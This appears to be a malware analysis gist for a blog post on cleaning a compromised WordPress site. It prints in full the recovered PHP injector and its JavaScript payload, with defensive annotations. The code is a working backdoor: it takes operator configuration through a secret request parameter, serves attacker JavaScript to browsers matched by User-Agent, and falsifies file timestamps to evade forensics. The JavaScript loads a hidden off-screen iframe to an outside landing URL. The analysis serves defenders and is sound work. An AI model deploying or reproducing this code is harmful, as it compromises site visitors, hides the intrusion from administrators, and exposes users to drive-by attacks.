Obfuscated PHP code on an exploited WordPress site http://wingho.io/clearing-visitortracker-malware-wordpress-website
// Analyst annotations (defensive review). This is the server-side half of a
// conditional JavaScript injector recovered from a compromised WordPress
// install: it keeps its configuration and a visitor log in two files beside
// itself, accepts new configuration from an operator through a secret request
// parameter, and serves an attacker-supplied JS payload only to visitors whose
// User-Agent matches an operator-defined filter. Everything else gets a
// harmless-looking JS comment.

// All paths are relative to the script's own directory. Both companion files
// carry image extensions but hold PHP-serialized settings (SETTINGS_FILE) and
// plain-text log lines (LOG_FILE) — file-based indicators to look for when
// cleaning a site.
if(!defined("CUR_PATH")){
define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR);
}
if(!defined("SETTINGS_FILE")){
define("SETTINGS_FILE",CUR_PATH."img.jpg");
}
if(!defined("LOG_FILE")){
define("LOG_FILE",CUR_PATH."dot.jpg");
}
// False unless an including file defined it first; when true, the
// HTTP_CONTENT_TYPES header gate below applies and no content-type header is sent.
if(!defined("IS_AJAX")){
define("IS_AJAX",false);
}
// Creates SETTINGS_FILE with inert defaults (status=0) on first execution.
check_exist_all();
// Secret parameter name: any request carrying it (POST or GET) is treated as an
// operator command; every other request is treated as a visitor. There is no
// authentication beyond knowledge of this string.
$pname = "UEYJHJSDHUEYBSJDHUWYE";
// Settings are loaded with unserialize() on raw file content; failures are silenced with @.
$SETTS = unserialize(@file_get_contents(SETTINGS_FILE));
// --- Operator branch: replace the stored configuration -----------------------
if(
(isset($_POST[$pname]) && !empty($_POST[$pname]) && strlen($_POST[$pname]) >0)
|| (isset($_GET[$pname]) && !empty($_GET[$pname]) && strlen($_GET[$pname]) >0)
){
$new_setts = $SETTS;
$ret = array();
if(isset($_POST[$pname])){
// POST form: one field per setting, named <pname>_<suffix>.
//   status    - 1 enables delivery
//   u         - target URL, stored base64-encoded
//   f         - User-Agent filter entries joined by "_#_"
//   ct        - cookie lifetime in seconds (0 = serve on every request)
//   code      - base64 JS template containing the {%%EK_URL%%} placeholder
//   mobile_on / log / debug - flags compared against 1 below
//   pts       - base64 path fragment handed to detect_doc_root()
$new_setts["status"] = $_POST[$pname."_status"];
$new_setts["u"] = base64_encode($_POST[$pname."_u"]);
$new_setts["f"] =$_POST[$pname."_f"]; //_#_
$new_setts["ct"] = $_POST[$pname."_ct"];
$new_setts["code"] = $_POST[$pname."_code"];
$new_setts["mobile_on"] = $_POST[$pname."_mobon"];
$new_setts["log"] = $_POST[$pname."_nlog"];
$new_setts["debug"] = $_POST[$pname."_debug"];
$new_setts["pts"] = base64_decode($_POST[$pname."_pts"]);
}else if(isset($_GET[$pname])){
// GET form: a single base64 blob whose fields are separated by "||__||",
// in the same order as the POST fields above.
$data = base64_decode($_GET[$pname]);
$data = explode("||__||",$data);
$new_setts["status"] = $data[0];
$new_setts["u"] = base64_encode($data[1]);
$new_setts["f"] = $data[2]; //_#_
$new_setts["ct"] = $data[3];
$new_setts["code"] = $data[4];
$new_setts["mobile_on"] = $data[5];
$new_setts["log"] = $data[6];
$new_setts["debug"] = $data[7];
$new_setts["pts"] = base64_decode($data[8]);
}else{
exit();
}
// The response reports the script's own absolute directory and path back to
// the caller, so an operator can locate the implant after a drop.
$server_script_dir = detect_doc_root($new_setts["pts"]).DIRECTORY_SEPARATOR.$new_setts["pts"].DIRECTORY_SEPARATOR;
$ret["pts"] = $server_script_dir;
$ret["script_path"] = $server_script_dir.basename($_SERVER["SCRIPT_NAME"]);
@file_put_contents(SETTINGS_FILE,serialize($new_setts));
// The file is stat()ed after the write and that mtime is handed to make_touch(),
// which applies it to the file and to the parent directory as well. Whether the
// value seen here is the pre-write timestamp depends on PHP's stat cache; the
// evident intent is to keep file and directory mtimes from standing out in
// mtime-based triage.
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
// Acknowledgement the operator's client expects. The literal "OKSETTSOK_START:"
// and "-END" markers are a usable signature for response-body inspection.
echo base64_encode("OKSETTS")."OKSETTSOK_START:".base64_encode(json_encode($ret))."-END";exit();;
exit();
}
// --- Operator diagnostics: <pname>_test -------------------------------------
// Renders the current payload, dumps the whole settings array and the visitor
// log. Anyone who knows the parameter name can read the full configuration.
if((isset($_GET[$pname."_test"]) && !empty($_GET[$pname."_test"]) && strlen($_GET[$pname."_test"]) >0)){
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
echo "\r\n\r\n_______________________\r\n\r\n";
echo base64_encode("OKSETTS");
echo "\r\n\r\n_______________________\r\n\r\n";
var_dump($SETTS);
echo "\r\n\r\n_______________________\r\n\r\n";
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
// --- Operator diagnostics: <pname>_shlog ------------------------------------
// Returns the raw visitor log (timestamp + User-Agent per matched visitor).
if((isset($_GET[$pname."_shlog"]) && !empty($_GET[$pname."_shlog"]) && strlen($_GET[$pname."_shlog"]) >0)){
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
// When included in AJAX mode, only requests whose HTTP_CONTENT_TYPES header
// contains the server name proceed; the header name is non-standard.
if(IS_AJAX){
if(!isset($_SERVER["HTTP_CONTENT_TYPES"]) || strpos($_SERVER["HTTP_CONTENT_TYPES"],$_SERVER["SERVER_NAME"])===false){
exit();
}
}
// --- Visitor branch: decide whether this request receives the payload --------
// $f is the "serve payload" decision, $is_mob selects the redirect flavour.
// A "mob" query parameter bypasses the User-Agent filter when mobile_on == 1.
if(isset($_GET["mob"]) && !empty($_GET["mob"]) && strlen($_GET["mob"]) >0 && $SETTS["mobile_on"] == 1){
$f = true;
$is_mob = true;
}else{
$is_mob = false;
// The filter is a "_#_"-separated list of User-Agent fragments.
$SETTS["f"] = (!empty($SETTS["f"]) && $SETTS["f"] != ""?explode("_#_",$SETTS["f"]):array());//explode("_#_",$SETTS["f"])
$f = false;
$ua = $_SERVER["HTTP_USER_AGENT"];
if(!empty($SETTS["f"])){
foreach($SETTS["f"] as $one){
/*if(preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)){
$f = true;
break;
}*/
// An entry containing "*" is used verbatim as a regular expression (no
// preg_quote); any other entry is quoted and must be followed by a
// version-like number in the UA. First match wins.
if(strpos($one,"*")!==false){
if (preg_match("|".$one."|i", $ua, $match)){
$f = true;
break;
}
}else{
if (preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match))
{
$f = true;
break;
}
}
}
}
}
// debug == 1 forces a match and swaps the target for http://google.com,
// a visible test destination for the operator.
if($SETTS["debug"] == 1){
$f = true;
$SETTS["u"] = base64_encode("http://google.com");
}
// log == 1: append "[timestamp]: <User-Agent>" for every matched visitor, then
// run the same mtime handling as for the settings file.
if($f && $SETTS["log"] == 1){
@file_put_contents(LOG_FILE,"[".date("Y-m-d H:i:s")."]: ".$ua."\r\n",FILE_APPEND);
$touch_exists = false;
if(file_exists(LOG_FILE)){
$ftime = @stat(LOG_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(LOG_FILE,$touch_exists,true);
}
// Delivery: requires a filter match, status == 1 and a non-empty target URL.
// A cookie (name stored as md5("is_uniq"), see set_cookie) limits delivery to
// once per ct seconds; ct == 0 serves on every request. Mobile visitors get a
// plain JS redirect, everyone else gets the stored JS template with the URL
// substituted. Repeat visitors and non-matching browsers receive show_bad_js().
if($f && $SETTS["status"] == 1 && !empty($SETTS["u"]) && strlen($SETTS["u"])>0){
$check_cook = get_cookie("is_uniq");
if(!$check_cook || $SETTS["ct"] == 0){
set_cookie("is_uniq","1",(time()+$SETTS["ct"]));
if($is_mob){
show_js_redirect($SETTS["u"]);
}else{
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
}
}else{
show_bad_js();
}
}else{
show_bad_js();
}
exit();
// Creates SETTINGS_FILE with inert defaults (status=0, empty URL/filter/code,
// flags at -1) when it does not exist yet, then stats the freshly written file
// and hands its mtime to make_touch(), which also touches the parent directory.
// Errors from file_exists/file_put_contents/stat are silenced with @.
function check_exist_all(){
if(!@file_exists(SETTINGS_FILE)){
@file_put_contents(SETTINGS_FILE,serialize(array("status"=>0,"u"=>"","f"=>"","ct"=>0,"code"=>"","pts"=>"","log"=>-1,"debug"=>-1,"mobile_on"=>-1)));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
}
}
// Decoy response for visitors who do not receive the payload: a JavaScript
// comment containing the current Unix time, served as application/x-javascript
// unless IS_AJAX is set. A "/*<digits>*/" body from a site script is a
// recognisable sign of this family in HTTP captures.
function show_bad_js(){
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo "/*".time()."*/";
}
// Emits the operator's JS template with the target URL substituted.
//   $e_url - base64-encoded target URL (decoded here)
//   $code  - already-decoded JS template; every "{%%EK_URL%%}" is replaced by the URL
// Served as application/x-javascript unless IS_AJAX is set. The URL is inserted
// without escaping, so the template's literal context is the operator's concern.
function show_good_js($e_url,$code){
$e_url = base64_decode($e_url);
$code = str_replace(array("{%%EK_URL%%}"),array($e_url),$code);
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo $code;
}
// Mobile variant of the payload: a one-line JS redirect to the decoded URL.
// iPhone/iPod browsers get location.replace() (no history entry); all others
// get window.location and document.location assignments. The content-type
// header is sent unconditionally here, unlike show_good_js().
function show_js_redirect($e_url){
$e_url = base64_decode($e_url);
header("content-type: application/x-javascript");
$redirect = "if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {location.replace('".$e_url."');}else{window.location = '".$e_url."';document.location = '".$e_url."';}";
echo $redirect;
}
// Derives a document-root guess from the script's real directory and the
// operator-supplied relative path ($path_to_script).
// - collapses "//" to "/" and strips one leading "/"
// - with an empty path, returns the script's own directory
// - otherwise removes DIRECTORY_SEPARATOR.$path_to_script from the real path
//   (str_replace removes every occurrence, not only a trailing one)
// Returns the resulting directory string; it is only used to report the
// implant's location back to the operator.
function detect_doc_root($path_to_script){
$path_to_script = str_replace("//","/",$path_to_script);
if(substr($path_to_script,0,1) == "/"){
$path_to_script = substr_replace($path_to_script, "", 0,1);
}
$full_path = realpath(dirname(__FILE__));
if($path_to_script == ""){
$doc_root = $full_path;
}else{
$doc_root = str_replace(DIRECTORY_SEPARATOR.$path_to_script,"",$full_path);
}
return $doc_root;
}
// Builds a random string of ASCII letters (a-z, A-Z) using array_rand(), which
// is not a cryptographic source. The loop runs from $min to $max inclusive, so
// the result has $max - $min + 1 characters; when $max is falsy or not greater
// than $min it is reset to 2 * $min. Not called anywhere in the visible listing.
function rand_string($min = 2,$max = false){
$abc = "qwertyuiopasdfghjklzxcvbnm";
$abc_up = strtoupper($abc);
$abc = str_split($abc);
$abc_up = str_split($abc_up);
$abc = array_merge($abc,$abc_up);
$return = array();
if(!$max || $max <= $min){
$max = $min + $min;
}
for($i =$min; $i <= $max; $i++){
$return[] = $abc[array_rand($abc)];
}
return implode("",$return);
}
// Sets a cookie whose name is the md5 of $name, so the visitor-side marker
// does not reveal its logical name. $expire is an absolute Unix timestamp.
// Domain is empty, secure is false, httponly is true. Returns setcookie()'s result.
function set_cookie($name = "", $value = "", $expire = 1, $path = "/"){
return setcookie(md5($name),$value,$expire,$path,"",false,true);
}
// Counterpart of set_cookie(): reads $_COOKIE[md5($name)].
// Returns the cookie value, or false when it is absent or empty().
function get_cookie($name = ""){
if(isset($_COOKIE[md5($name)]) && !empty($_COOKIE[md5($name)])){
return $_COOKIE[md5($name)];
}else{
return false;
}
}
// Timestamp manipulation helper.
//   $fpath         - file whose mtime is rewritten
//   $touch_exist   - mtime to apply; when falsy, get_some_touch() supplies the
//                    oldest mtime found among the parent directory's entries
//   $touch_par_dir - when exactly true, the parent directory gets the same mtime
// Both touch() calls are @-silenced. The apparent purpose is anti-forensic:
// keeping the dropped files and their directory from standing out in
// mtime-ordered listings or "recently modified" searches. Responders should
// therefore not rely on mtime alone and should compare ctime/inode data or
// file-integrity baselines instead.
function make_touch($fpath,$touch_exist = false,$touch_par_dir = false){
$ttime = 0;
if($touch_exist){
$ttime = $touch_exist;
}else{
$ttime = get_some_touch($fpath);
}
@touch($fpath,$ttime);
if($touch_par_dir===true){
// Strip the last path component to obtain the parent directory, ensuring a
// trailing separator.
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
@touch($fpath,$ttime);
}
}
// Picks a plausible "old" mtime for $fpath: stats every entry in $fpath's
// parent directory (excluding "." and ".."), sorts the mtimes ascending, and
// returns the smallest one if it is positive. With no usable entry it returns
// a timestamp 3600*24*30*12 seconds (about 360 days) in the past.
function get_some_touch($fpath){
// Reduce $fpath to its parent directory with a trailing separator.
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
$dirs = array_diff(scandir($fpath),array(".",".."));
$touches = array();
foreach($dirs as $one){
$stat = stat($fpath.$one);
$touches[] = $stat['mtime'];
}
//asort($touches);
sort($touches, SORT_NUMERIC);
if(isset($touches[0]) and !empty($touches) and $touches[0]>0)
return $touches[0];
else
return (time() - (3600*24*30 * 12));
}
<script type="text/javascript" id="id_2649819"> | |
// Self-removal: deletes the injected <script> element (id "id_2649819") from
// the DOM after the payload has run, so it is absent from the live page tree
// even though it remains in the served HTML source.
function lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR() {
var e = "id_2649819";
if ("none" != e) {
var i = document.getElementById(e);
// outerHTML = "" drops the node; "delete i" only clears the local reference.
void 0 != typeof i && null != i && (i.outerHTML = "", delete i)
}
}
// Browser gate. Returns true when document.all exists (legacy Internet
// Explorer, whichever of the feature checks fires first), or when a browser
// without document.all reports navigator.maxTouchPoints and the UA version
// probe below returns a truthy value (Trident/Edge tokens). Otherwise false.
function gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU() {
return document.all && !document.compatMode ? !0 : document.all && !window.XMLHttpRequest ? !0 : document.all && !document.querySelector ? !0 : document.all && !document.addEventListener ? !0 : document.all && !window.atob ? !0 : document.all ? !0 : "undefined" != typeof navigator.maxTouchPoints && !document.all && iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() ? !0 : !1
}
// Parses an IE/Edge major version out of the User-Agent string:
// "MSIE <n>", "Trident/... rv:<n>" or "Edge/<n>". Returns the parsed integer,
// or false when none of the three tokens is present.
function iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() {
var e = window.navigator.userAgent,
i = e.indexOf("MSIE ");
if (i > 0) return parseInt(e.substring(i + 5, e.indexOf(".", i)), 10);
var t = e.indexOf("Trident/");
if (t > 0) {
// IE 11 drops "MSIE" and carries the version after "rv:".
var n = e.indexOf("rv:");
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
}
var o = e.indexOf("Edge/");
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
}
// Mobile-browser detection: tests the lower-cased User-Agent against a long
// alternation (first on the whole string, then a second pattern on its first
// four characters). The pattern appears to be the widely circulated
// detectmobilebrowsers regex rather than anything bespoke. Returns true/false.
function BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() {
var e = window.navigator.userAgent.toLowerCase();
return /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0, 4)) ? !0 : !1
}
// Entry point of the injected client-side payload. Polls every 100 ms until
// document.body exists, then runs exactly once per page, guarded by the
// window-level flag v_35763a2628ec5f7420be3779607dfe04.
var NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn = setInterval(function() {
if (null != document.body && "undefined" != typeof document.body) {
if (clearInterval(NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn), "undefined" == typeof window.v_35763a2628ec5f7420be3779607dfe04) {
window.v_35763a2628ec5f7420be3779607dfe04 = 1;
// e: IE/Edge per the two probes above; i: Google Chrome (vendor string);
// t: mobile-redirect switch, hard-coded off (-1);
// n: landing URL — the network indicator to block and hunt for in proxy logs.
var e = iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() && gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU(),
i = !e && !!window.chrome && "Google Inc." === window.navigator.vendor,
t = -1,
n = "http://zxcgheytergfdgdfg.cf/052F";
// Mobile redirect branch: unreachable while t is -1.
if (BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() && 1 == t) navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ? location.replace(n) : (window.location = n, document.location = n);
// Desktop IE/Edge that is not Chrome and not mobile: load n in a 10x10 iframe
// positioned 3532 px off the left edge, appended to the middle <div> of the
// page or, when the page has no <div>, to the body. The visitor sees nothing.
else if (e && !i && !BvYpXdZglDLRdNvGFNxeifOmYPRQhQg()) {
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' + n + '" height="10px"></iframe></div>',
a = document.getElementsByTagName("div");
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
else {
var d = a.length,
r = Math.floor(d / 2);
a[r].innerHTML = a[r].innerHTML + o
}
}
}
// Remove the injected <script> element from the DOM.
lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR()
}
}, 100);
</script> |
Gists for blog post:
http://wingho.io/clearing-visitortracker-malware-wordpress-website